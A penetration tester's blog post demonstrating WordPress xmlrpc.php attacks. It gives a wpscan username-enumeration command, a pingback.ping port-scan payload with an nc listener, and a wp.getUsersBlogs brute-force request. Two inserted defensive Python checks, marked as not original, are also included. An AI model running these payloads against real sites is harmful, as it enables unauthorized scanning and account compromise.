XML-RPC PHP WordPress Vulnerabilities

Mohammad Mohsin
5 min read · Feb 16, 2021


Hi Readers,

In this post I am going to explain what the xmlrpc.php WordPress vulnerabilities are and how they get exploited. I am mainly targeting the following attacks:

  1. Username enumeration.
  2. Cross-Site Port Attack (XSPA), or port scanning.
  3. Brute-force attack using xmlrpc.php.

Before that, I would like to give some background on WordPress and xmlrpc.php.

What is WordPress?

WordPress is web publishing software you can use to create your own website or blog. Nowadays, WordPress has become one of the most popular web publishing platforms. WordPress is capable of creating any style of website, from a simple blog to a full-featured business website.

What is xmlrpc.php in WordPress?

XML-RPC is a feature of WordPress that enables data to be transmitted, with HTTP acting as the ‘transport mechanism’ and XML as the ‘encoding mechanism’. Basically it is an Application Programming Interface that allows developers to communicate with the website remotely from any kind of device; for example, developers can upload, modify, delete or update website content from their mobile device when they are not carrying a laptop with them.

The following are some of the important methods used to determine and exploit the vulnerabilities mentioned above:

i) system.listMethods
ii) wp.getUsersBlogs
iii) wp.getCategories
iv) metaWeblog.getUsersBlogs

So, without wasting more time, let’s jump into the POC to analyze the exploitation step by step.

Target URL: http://redacted.com/xmlrpc.php (dummy domain name used to mask the original one)

POC:

Step 1: Navigate to the domain’s xmlrpc.php page. If you get the message below, xmlrpc.php may be disabled and precautions have already been taken to protect against these attacks.

Step 2: If you get the message below, xmlrpc.php is enabled on the remote server.

Step 3: Capture the request in a web proxy tool like Burp Suite. As shown in the screenshot below, the xmlrpc.php page only accepts POST requests.

Step 4: Next, send a POST request to check which methods are enabled on the XML-RPC server. As shown in the request below, “system.listMethods” is used to list the methods the XML-RPC server supports.

Supported Methods

As you can see above, all the methods that are useful for performing the attacks are enabled on the remote XML-RPC server. Let’s perform the attacks mentioned above one after another.
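To turn Step 4 into a repeatable check you can run against your own site, here is an added Python example (not code from the original post). It builds the same system.listMethods request body with the standard library’s xmlrpc.client, parses a listMethods response, and reports which of the methods singled out above are exposed. Both response bodies are constructed samples, not captures from any site; the fault code and text for the disabled case are placeholders standing in for the message Step 1 refers to.

```python
"""Check which XML-RPC methods a WordPress site exposes (Step 4 as code).

Added example, not part of the original post. The request body is the
same system.listMethods call the post sends; the responses below are
constructed samples, not captures from any real site.
"""
from __future__ import annotations

import xmlrpc.client

# Methods the post singles out: pingback.ping is the XSPA / DDoS vector,
# the other three take a username and password and so allow credential
# guessing over XML-RPC.
RISKY_METHODS = {
    "pingback.ping": "XSPA / port scanning via pingback",
    "wp.getUsersBlogs": "accepts credentials: brute-force vector",
    "wp.getCategories": "accepts credentials: brute-force vector",
    "metaWeblog.getUsersBlogs": "accepts credentials: brute-force vector",
}


def build_list_methods_call() -> str:
    """Return the POST body for system.listMethods (what Step 4 sends)."""
    return xmlrpc.client.dumps((), methodname="system.listMethods")


def parse_list_methods_response(xml_body: str) -> list[str]:
    """Unwrap a methodResponse carrying an array of method names.

    A <fault> response (the case where XML-RPC has been disabled, as in
    Step 1) makes xmlrpc.client.loads raise xmlrpc.client.Fault.
    """
    params, _method = xmlrpc.client.loads(xml_body)
    return list(params[0])


def exposed_risky_methods(xml_body: str) -> dict[str, str]:
    """Map each exposed risky method to the reason it matters.

    An empty dict means either nothing risky is exposed or the endpoint
    answered with a fault (XML-RPC disabled).
    """
    try:
        names = parse_list_methods_response(xml_body)
    except xmlrpc.client.Fault:
        return {}
    return {name: why for name, why in RISKY_METHODS.items() if name in names}


# Constructed sample: a site that still exposes every method from the post.
SAMPLE_ENABLED_RESPONSE = xmlrpc.client.dumps(
    (["system.listMethods", "pingback.ping", "wp.getUsersBlogs",
      "wp.getCategories", "metaWeblog.getUsersBlogs"],),
    methodresponse=True,
)

# Constructed sample: the fault a site returns once XML-RPC is switched off
# (code and text are placeholders, not a verbatim WordPress message).
SAMPLE_DISABLED_RESPONSE = xmlrpc.client.dumps(
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site.")
)

if __name__ == "__main__":
    print(build_list_methods_call())
    for body in (SAMPLE_ENABLED_RESPONSE, SAMPLE_DISABLED_RESPONSE):
        found = exposed_risky_methods(body)
        print("exposed:", found or "none (disabled or nothing risky)")
```

In practice you would POST the body from build_list_methods_call() to your own site’s xmlrpc.php and feed the response text to exposed_risky_methods(); an empty result after the fault branch is the state Step 1 describes, while any entry in the result is a method still reachable by the attacks that follow.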

  1. Username Enumeration: For username enumeration, I am going to use wpscan, a popular scanner for WordPress vulnerabilities.

You can download and install wpscan from the following URL:

wpscan: https://github.com/wpscanteam/wpscan.git

Command: wpscan --url http://www.redacted.com --enumerate u

As shown in the evidence below, I was able to collect the correct username, which I will call “Actor”, since the original username is intentionally hidden.

Username Enumerated — Actor

2. Cross-Site Port Attack (XSPA) or Port Scanning:

To perform XSPA or port scanning we need to check which methods are supported by XML-RPC; “pingback.ping” is the one mainly abused by attackers to launch XSPA or DDoS attacks. As we know, “pingback.ping” is enabled on the XML-RPC server (from Step 4).

XSPA is achieved in the following way:

  1. Since we want the server to ping back to us, we need a public IP/server to listen on. In this example, I am using a cloud instance of Kali Linux to host a server (http://pt.drspitfire.com) listening on HTTP port 80.
  2. Fire up Kali Linux and start a listener on port 80. The command used to achieve this is:
$ nc -lvp 80
Once the pingback arrives, the listener shows the incoming request, for example:
GET / HTTP/1.1
Host: pt.drspitfire.com
Listener activated on Port 80 on Test Server http://pt.drspitfire.com

Now we need to send a pingback request to perform the port scan. In the screenshot below, a pingback request has been sent to check whether port 4447 is open on the test server “http://pt.drspitfire.com”. Two parameters are required in the request body:

  1. A pingback call to the external test server (here http://pt.drspitfire.com) along with the port (here 80). This is basically the attacker-controlled server.
  2. The URL of a valid blog post on the target website. We need to include the following sample XML data in the POST request body:
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value><string>YOUR_Test_SERVER:YOUR_PORT</string></value>
    </param>
    <param>
      <value><string>URL_TO_A_Valid_BLOG_ON_THE_WEBSITE</string></value>
    </param>
  </params>
</methodCall>

As shown in the evidence below, when the port is closed on the external test server the response time is low, i.e. 763 milliseconds, and no traces have been recorded on our listener so far.

Response time is 763 ms when the port is closed

As shown in the evidence below, when the port is open on the external test server the response time increases to 12,028 milliseconds, and traces are recorded on our listener as shown below.

Response time is 12,028 ms when the port is open

As soon as the above request is sent, the victim host (x.xx.242.211) gets an entry in its log file with a request originating from the WordPress domain verifying the pingback, which can be seen in the screenshot below.

WordPress version 5.2.3 is used on the website, as recorded on the listener

3. Brute Force Attack Using xmlrpc.php:

Basically, the following methods can enable a brute force attack if they are enabled on the XML-RPC server:

  1. wp.getUsersBlogs
  2. wp.getCategories
  3. metaWeblog.getUsersBlogs

As we know, all of the above methods are enabled on the XML-RPC server (from Step 4).

Now, recall our first attack, where we enumerated the username “Actor”. We will use this enumerated username and a list of passwords to perform a brute force attack using the wp.getUsersBlogs method.

To perform the brute force attack we use the following sample XML data with the username Actor and a random password:

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value>Actor</value></param>
    <param><value>Actor123</value></param>
  </params>
</methodCall>

As shown below, the brute force attack is applied using the wp.getUsersBlogs method. On the correct password the attacker will have the user’s dashboard, but in this case none of the passwords tried from the password list worked.

Brute Force Attack using wp.getUsersBlogs Method
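Since the post stops short of the defensive side, here is an added Python example (not code from the original post) showing what a detection for both patterns above could look like: the pingback-based XSPA from section 2 and the credential guessing against wp.getUsersBlogs and friends from section 3. It assumes the request bodies sent to xmlrpc.php are available to the defender (for instance from a WAF or reverse-proxy body log); the traffic, IP addresses, hostnames and the GUESS_THRESHOLD value are constructed or assumed, not taken from the post.

```python
"""Detect the two xmlrpc.php abuse patterns from the post in request traffic.

Added example, not part of the original post. It assumes the XML-RPC
request bodies reaching /xmlrpc.php are available to the defender, e.g.
from a WAF or reverse-proxy body log; the events below are constructed.
"""
from __future__ import annotations

import ipaddress
import xmlrpc.client
from collections import Counter
from typing import Optional
from urllib.parse import urlsplit

# Methods from section 3 that take a username and password.
CREDENTIAL_METHODS = {"wp.getUsersBlogs", "wp.getCategories", "metaWeblog.getUsersBlogs"}
# Assumed tuning value: how many credential-bearing calls from one client
# before raising a password-guessing alert. Tune it to your own traffic.
GUESS_THRESHOLD = 5


def parse_call(body: str) -> tuple[Optional[str], tuple]:
    """Return (methodName, params), or (None, ()) if body is not a methodCall."""
    try:
        params, method = xmlrpc.client.loads(body)
    except Exception:  # malformed XML, unsupported value types, etc.
        return None, ()
    return method, params


def suspicious_pingback(source_url: str) -> Optional[str]:
    """Explain why a pingback 'source' URL looks like XSPA, or None if not.

    In section 2 the first pingback.ping parameter is the attacker's
    host:port; WordPress fetches it, so a non-web port or an internal
    address is the port-scan signature.
    """
    parts = urlsplit(source_url)
    if parts.scheme not in ("http", "https"):
        return f"non-web scheme {parts.scheme!r}"
    try:
        port = parts.port
    except ValueError:
        return "unparseable port"
    if port is not None and port not in (80, 443):
        return f"pingback source on port {port}"
    try:
        ip = ipaddress.ip_address(parts.hostname or "")
    except ValueError:
        return None  # a hostname on a web port: an ordinary-looking pingback
    if ip.is_private or ip.is_loopback or ip.is_link_local:
        return f"pingback source is an internal address {ip}"
    return "pingback source is a bare IP address rather than a blog hostname"


def analyse(events) -> list[str]:
    """events: iterable of (client_ip, request_body). Returns alert lines."""
    alerts: list[str] = []
    guesses: Counter = Counter()
    for client_ip, body in events:
        method, params = parse_call(body)
        if method == "pingback.ping" and params:
            reason = suspicious_pingback(str(params[0]))
            if reason:
                alerts.append(f"{client_ip}: XSPA-style pingback ({reason}): {params[0]}")
        elif method in CREDENTIAL_METHODS:
            guesses[client_ip] += 1
            if guesses[client_ip] == GUESS_THRESHOLD:  # alert once per client
                alerts.append(
                    f"{client_ip}: {GUESS_THRESHOLD} credential-bearing calls "
                    f"({method}); likely password guessing"
                )
    return alerts


def _call(method: str, *params) -> str:
    """Build a methodCall body shaped like the XML shown in the post."""
    return xmlrpc.client.dumps(params, methodname=method)


# Constructed traffic (documentation-range IPs, invented hostnames).
BLOG_POST = "http://blog.example/2021/02/some-post/"
SAMPLE_EVENTS = [
    ("198.51.100.7", _call("pingback.ping", "http://203.0.113.9:4447/", BLOG_POST)),
    ("198.51.100.7", _call("pingback.ping", "http://other-blog.example/post/", BLOG_POST)),
    ("198.51.100.7", _call("pingback.ping", "http://127.0.0.1/", BLOG_POST)),
    ("203.0.113.50", "this is not xml-rpc at all"),
] + [("192.0.2.44", _call("wp.getUsersBlogs", "Actor", f"guess{i}")) for i in range(6)]

if __name__ == "__main__":
    for line in analyse(SAMPLE_EVENTS):
        print(line)
```

Run against the constructed events it raises three alerts: the pingback aimed at port 4447, the one aimed at the loopback address, and the sixth wp.getUsersBlogs call crossing the threshold; the pingback from an ordinary blog hostname passes. The port check mirrors what the post measures from the other side (the 4447 vs. 80 timing difference), and the per-client counter is the cheapest signal for the section 3 pattern, since every guess arrives as one POST carrying a credential-bearing method name.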

I hope this helps in understanding the attack vectors when xmlrpc.php is enabled. I am not explaining precautions, as there are plenty of blogs and articles that explain how to disable XML-RPC on the server.

Suggestions are always welcome!

Please follow for further reading:

Linkedin: https://www.linkedin.com/in/bughuntermaddy

Twitter: https://twitter.com/bughuntermaddy?s=08

Thank You!


Mohammad Mohsin

Director - OLF Infotech Pvt. Ltd. Ethical Hacker, Vulnerability Assessment and Penetration Tester, Bug Hunter, Security Researcher, Optimistic, Philanthropist.